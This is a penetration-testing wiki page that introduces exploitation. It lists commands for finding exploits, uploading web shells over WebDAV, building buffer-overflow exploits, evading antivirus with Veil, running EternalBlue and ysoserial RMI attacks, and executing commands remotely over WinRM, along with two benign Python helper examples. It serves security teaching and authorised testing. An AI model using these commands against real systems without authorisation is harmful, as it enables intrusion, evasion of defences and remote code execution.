Intro to exploitation

Penetration Testing Wiki

How to find exploits

In Kali Linux, search the local Exploit-DB mirror:

searchsploit <SERVICE NAME>

Google:

site:exploit-db.com APP VERSION

Exploit suggesters (match the target's kernel version or patch level against known privilege-escalation exploits):

linux-exploit-suggester.sh -k 2.6.9
windows-exploit-suggester.py -d <database.xlsx> -i <systeminfo file>
linuxprivchecker.py

linux-exploit-suggester.sh and linuxprivchecker.py run on the target (-k lets you supply a kernel version offline instead); windows-exploit-suggester.py runs on your machine against a saved `systeminfo` dump and needs the Microsoft bulletin spreadsheet first (fetch it with --update). All three only compare version strings and patch lists, so treat their output as candidates to verify, not confirmed vulnerabilities.
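
What these suggester scripts consume, and why they over-report, as an added example in Python (not the page's code and not windows-exploit-suggester's). It parses the fields of a constructed `systeminfo` dump of the kind passed with -i and compares the installed hotfixes against a small lookup table of our own. The MS17-010 entry in that table is real (KB4012212 is the security-only update and KB4012215 the monthly rollup for Windows 7 SP1 / Server 2008 R2 SP1); the table layout and the names PATCH_TABLE, parse_systeminfo and missing_patches are assumptions for the demo.

```python
import re

# Constructed sample of `systeminfo` output (not captured from a real host).
# The hotfix list is deliberately short so the check below has something to flag.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-LAB
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB3035131
Network Card(s):           1 NIC(s) Installed.
"""

# Hypothetical lookup table for the demo. Only the MS17-010 KB numbers are
# real (security-only KB4012212, monthly rollup KB4012215 for 6.1 hosts);
# the structure is ours, not the real tool's.
PATCH_TABLE = {
    "MS17-010": {
        "os": "6.1",                       # NT version prefix of OS Version
        "kbs": {"KB4012212", "KB4012215"}, # any one of these closes the hole
        "msf": "exploit/windows/smb/ms17_010_eternalblue",
    },
}


def parse_systeminfo(text):
    """Extract OS name/version/arch and the installed KB list from systeminfo."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        m = re.match(r"^(OS Name|OS Version|System Type):\s*(.+?)\s*$", line)
        if m:
            info[m.group(1)] = m.group(2)
            continue
        # hotfix lines look like "   [01]: KB2534111"
        m = re.match(r"^\s*\[\d+\]:\s*(KB\d+)", line)
        if m:
            info["hotfixes"].append(m.group(1))
    return info


def missing_patches(info, table=PATCH_TABLE):
    """Return (bulletin, metasploit module) for table entries whose fixing KB
    is absent on a host with a matching OS version."""
    version = info.get("OS Version", "")
    installed = set(info["hotfixes"])
    hits = []
    for bulletin, entry in table.items():
        if version.startswith(entry["os"]) and not (installed & entry["kbs"]):
            hits.append((bulletin, entry["msf"]))
    return hits


if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(host["OS Version"], host["System Type"], host["hotfixes"])
    for bulletin, module in missing_patches(host):
        print("possible", bulletin, "->", module)
```

Absence of a KB is evidence, not proof: a later cumulative rollup supersedes KB4012212 without that number ever appearing in `systeminfo`, which is why this toy and the real tool both produce false positives. Confirm at the service level (for MS17-010, nmap's smb-vuln-ms17-010 script) before launching an exploit.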

NULL session (anonymous SMB logon to the IPC$ share, from a Windows client):

net use \\$IP\ipc$ "" /user:""

Current Windows versions reject null sessions by default, so this mostly works against legacy hosts or servers where anonymous access was deliberately relaxed.

WebDAV (when the server allows PUT, upload a web shell directly):

cadaver http://$IP
dav:/> put webshell.aspx

If the server rejects the .aspx extension, upload the file under an allowed extension and rename it with cadaver's move command.

Compilers

To cross-compile Windows exploits on Linux:

First install the package:

apt-get install mingw-w64

Command line for C (32-bit target; use the x86_64-w64-mingw32- prefix for 64-bit targets):

i686-w64-mingw32-gcc 100.c -o 100.exe -lws2_32

Put -l flags after the source file: the linker only pulls symbols out of a library for objects it has already seen, so a library listed before the source leaves Winsock calls unresolved. Useful libraries for socket-based exploits:

-lws2_32 -lmswsock

Command line for C++ (the mingw-w64 package ships i686-w64-mingw32-g++; i686-mingw32-g++ belonged to the old mingw32 package):

i686-w64-mingw32-g++ main.cpp -o main.exe -static

-static bundles the MinGW runtime so the binary does not depend on libgcc/libstdc++ DLLs that the target will not have.

To obfuscate a python or bat script:

Reversing in Linux

Tools:

radare2

Useful commands inside radare2 (open the target first with r2 ./binary):

is: Show symbols
iS: Show sections
ii: Show imports
iI: Binary info
ia: Show all info
i?: All commands starting with i

egg-hunter (a small search stub for when the space at the crash is too small for the payload: the stub scans memory for the 8-byte egg and jumps to the code that follows it, so prefix the real payload with the 4-byte tag twice, e.g. W00TW00T):

/usr/share/metasploit-framework/tools/exploit/egghunter.rb -f python -e W00T

Buffer Overflow offsets (send the pattern as the overflow data, then look up the value that landed in EIP; -l must be the same length both times, and -q takes either the register value in hex or the four pattern characters):

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 256
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 256 -q 773870B4

A query that does not decode to four pattern characters (the address above looks like a library address rather than overwritten pattern bytes) gets no exact match; in that case EIP was not overwritten by your buffer and the crash needs a closer look in the debugger.
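
How the two pattern tools fit together, as an added Python example (not the page's code and not Metasploit's): pattern_create reproduces the Aa0Aa1... sequence of pattern_create.rb, and pattern_offset decodes a register value the way pattern_offset.rb does, little-endian, so the four bytes that overwrote EIP map back to an offset in the buffer you sent. The function names are ours.

```python
import itertools
import re

# Same character sets pattern_create.rb uses by default.
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes


def pattern_create(length):
    """Build the de Bruijn-style pattern Aa0Aa1...Aa9Ab0... cut to length.

    Every 4-byte window is unique, so any 4 bytes that land in a register
    identify exactly one position in the buffer."""
    if length > MAX_UNIQUE:
        # pattern_create.rb would start repeating here, making offsets ambiguous
        raise ValueError("pattern would repeat after %d bytes" % MAX_UNIQUE)
    chunks = []
    for u, l, d in itertools.product(UPPER, LOWER, DIGITS):
        chunks.append(u + l + d)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(query, length):
    """Offset of query in the pattern of the given length, or None.

    query is either the crashed register value as 8 hex digits (decoded
    little-endian, as pattern_offset.rb does, because x86 stores the dword
    low byte first) or the 4 raw characters seen in memory."""
    if re.fullmatch(r"[0-9A-Fa-f]{8}", query):
        needle = bytes.fromhex(query)[::-1].decode("latin-1")
    else:
        needle = query
    pos = pattern_create(length).find(needle)
    return pos if pos >= 0 else None


if __name__ == "__main__":
    print(pattern_create(256))
    # a crash with EIP = 0x64413364 (bytes "d3Ad" in memory order)
    print(pattern_offset("64413364", 256))
```

For a 256-byte pattern an EIP of 0x64413364 (the characters d3Ad in memory order) decodes to offset 100, so bytes 100 to 103 of the buffer are the return address. A value such as 773870B4 contains bytes outside the pattern alphabet and returns None, which matches pattern_offset.rb reporting no exact match. Unlike pattern_create.rb, which repeats the sequence past 20280 bytes, this version refuses such lengths so an offset can never be ambiguous.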

Reversing in Windows

Tools:

  • IDA Pro
  • OllyDbg
  • Immunity Debugger
  • https://github.com/corelan/mona Corelan repository for mona.py, a plugin for Immunity Debugger and WinDbg that finds jmp esp gadgets, bad characters and pattern offsets and builds ROP chains
  • http://www.rohitab.com/apimonitor API Monitor is free software that lets you monitor and control API calls made by applications and services. It's a powerful tool for seeing how applications and services work or for tracking down problems in your own applications.

Reversing .NET

Fuzzing

Linux

  • sfuzz (kali)
  • radamsa
  • spike

Windows

  • WinAFL (https://github.com/googleprojectzero/winafl), the Windows port of AFL

AFL is a popular coverage-guided fuzzer. It combines fast target execution with clever heuristics to find new execution paths in the target binary, and it has been used to find a large number of vulnerabilities in real products. AFL itself targets Linux and other Unix-like systems; WinAFL brings the same approach to Windows binaries, using DynamoRIO instrumentation instead of compile-time instrumentation.

AV Evasion

  • Veil: encrypts, encodes and obfuscates msfvenom-style payloads

Thanks to @ReneFreingruber (https://twitter.com/ReneFreingruber/status/1031140505453842432) for the following tip.

To remove "/var/lib/veil" strings from Veil's Go payloads and make reverse engineering harder, pass these go build flags (they strip that directory prefix from the source paths the Go toolchain embeds in the binary):

-gcflags=-trimpath=/var/lib/veil -asmflags=-trimpath=/var/lib/veil

Other tools:

SMB exploitation

EternalBlue (MS17-010; the Metasploit module targets Windows 7 and Server 2008 R2 x64, all service packs):

use exploit/windows/smb/ms17_010_eternalblue

Scan the range for known SMB bugs first. smb-vuln-ms17-010 is the check for EternalBlue; unsafe=1 enables checks that can crash the target service, so do not run this against production hosts without approval:

nmap -sS -T4 --open -p 139,445 --script=smb-vuln-ms17-010,smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos --script-args=unsafe=1 $IP/24

References:

Java RMI exploitation

Nmap will recognize it as:

XXXX/tcp  open  rmiregistry       Java RMI

Exploiting RMI

With nmap:

nmap --script=rmi-vuln-classloader -p 1099 $IP
nmap --script=rmi-dumpregistry -p 1099 $IP

With metasploit:

use exploit/multi/misc/java_rmi_server

With ysoserial (a deserialization gadget chain delivered to the registry; the port must be the registry port found above, 1099 by default, and CommonsCollections1 only fires if that library is on the server's classpath and the JDK predates the JEP 290 deserialization filters added in 8u121):

java -cp ysoserial.jar ysoserial.RMIRegistryExploit $IP 1099 CommonsCollections1 calc.exe

With the Java monitoring and performance console (jconsole attaches to a JMX endpoint, which is usually exposed over RMI; an unauthenticated one shows OS and application parameters and lets you invoke MBean operations):

jconsole $IP:$PORT

WinRM exploitation

WinRM listens on 5985 (HTTP) and 5986 (HTTPS). With valid credentials for a member of Administrators or Remote Management Users on the target:

winrs -r:$HOST $CMD
Test-WSMan -ComputerName $HOST

Test-WSMan only confirms that the service answers; winrs runs $CMD on the remote host. More info about WinRM lateral movement: https://www.hackingarticles.in/winrm-penetration-testing/